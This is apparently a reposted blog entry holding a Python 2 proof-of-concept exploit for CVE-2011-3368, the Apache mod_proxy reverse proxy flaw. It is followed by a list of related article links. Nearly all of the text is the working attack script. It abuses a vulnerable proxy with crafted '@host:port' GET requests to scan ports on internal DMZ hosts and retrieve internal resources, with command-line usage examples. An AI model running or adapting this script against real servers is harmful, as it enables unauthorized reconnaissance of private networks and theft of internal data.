Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
2013-08-19 18:14
531 查看
#!/usr/bin/env python import socket import string import getopt, sys known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] def send_request(url, apache_target, apache_port, internal_target, internal_port, resource): get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n" get = get + "Host: " + apache_target + "\r\n\r\n" remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remoteserver.settimeout(3) try: remoteserver.connect((apache_target, int(apache_port))) remoteserver.send(get) return remoteserver.recv(4096) except: return "" def get_banner(result): return result[string.find(result, "\r\n\r\n")+4:] def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource): print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource) for port in tested_ports: port = str(port) result = send_request(url, apache_target, apache_port, internal_target, port, resource) if string.find(result,"HTTP/1.1 200")!=-1 or \ string.find(result,"HTTP/1.1 30")!=-1 or \ string.find(result,"HTTP/1.1 502")!=-1: print "- Open port: " + port + "/TCP" print get_banner(result) elif len(result)==0: print "- Filtered port: " + port + "/TCP" else: print "- Closed port: " + port + "/TCP" def usage(): print print "CVE-2011-3368 proof of concept by Rodrigo Marcos" print "http://www.secforce.co.uk" print print "usage():" print "python apache_scan.py [options]" print print " [options]" print " -r: Remote Apache host" print " -p: Remote Apache port (default is 80)" print " -u: URL on the remote web server (default is /)" print " -d: Host in the DMZ (default is 127.0.0.1)" print " -e: Port in the DMZ (enables 'single port scan')" print " -g: GET request to the host in the DMZ (default is /)" print " -h: Help page" print print "examples:" print " - Port scan of the remote host" print " python apache_scan.py -r www.example.com -u /images/test.gif" print " - Port scan of a host in the DMZ" print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local" print " - Retrieve a resource from a host in the DMZ" print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html" print def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource): print print "CVE-2011-3368 proof of concept by Rodrigo Marcos" print "http://www.secforce.co.uk" print print " [+] Target: " + apache_target print " [+] Target port: " + apache_port print " [+] Internal host: " + internal_target print " [+] Tested ports: " + str(tested_ports) print " [+] Internal resource: " + resource print def main(): global apache_target global apache_port global url global internal_target global internal_port global resource try: opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"]) except getopt.GetoptError: usage() sys.exit(2) try: for o, a in opts: if o in ("-h", "--help"): usage() sys.exit(2) if o == "-u": url=a if o == "-r": apache_target=a if o == "-p": apache_port=a if o == "-d": internal_target = a if o == "-e": internal_port=a if o == "-g": resource=a except getopt.GetoptError: usage() sys.exit(2) if apache_target == "": usage() sys.exit(2) url = "/" apache_target = "" apache_port = "80" internal_target = "127.0.0.1" internal_port = "" resource = "/" main() if internal_port!="": tested_ports = [internal_port] else: tested_ports = known_ports scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
相关文章推荐
- mod_proxy - Apache HTTP Server
- ($_SERVER['REMOTE_ADDR'])和($_SERVER['HTTP_CLIENT_IP'])的区别
- $_SERVER['HTTP_HOST']在客户的环境里,取得的值总是程序所在的服务器在其局域网内的ip值解决方法
- $_SERVER['HTTP_HOST']
- AJAX 请求区分 $_SERVER['HTTP_X_REQUESTED_WITH']
- Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
- 使用mod_jk 连接apache http server 和 tomcat
- you don't have permission to access / on this server(Apache Server权限访问问题)
- PHP Storm Built In Server Doesn't Recognize mod_rewrite
- ($_SERVER['REMOTE_ADDR'])和($_SERVER['HTTP_CLIENT_IP'])的区别
- Apache Traffic Server——HTTP Proxy Caching
- AJAX 请求区分 $_SERVER['HTTP_X_REQUESTED_WITH'] 小解
- Apache HTTP Server mod_session_dbd模块mod_session_dbd.c 安全漏洞
- HTTP 2.0 Client & HTTP 2.0 Server & HTTP 2.0 Proxy
- Apache HTTP Server存在…
- Apache HTTP Server通过mod_cluster模块与Tomcat连接
- 无效的过程调用或参数: 'leftB' 与web.config 文件的 system.webServer/httpErrors 节中不允许绝对物理路径“C:/inetpub/custerr”。请改用相对路径解决办法
- Centos下安装apache,php Can't connect to MySQL server on 'server' (13)
- Apache HTTP Server 与 Tomcat 的三种连接方式介绍mod_jk等
- PHP的$_SERVER['HTTP_HOST']获取服务器地址功能详解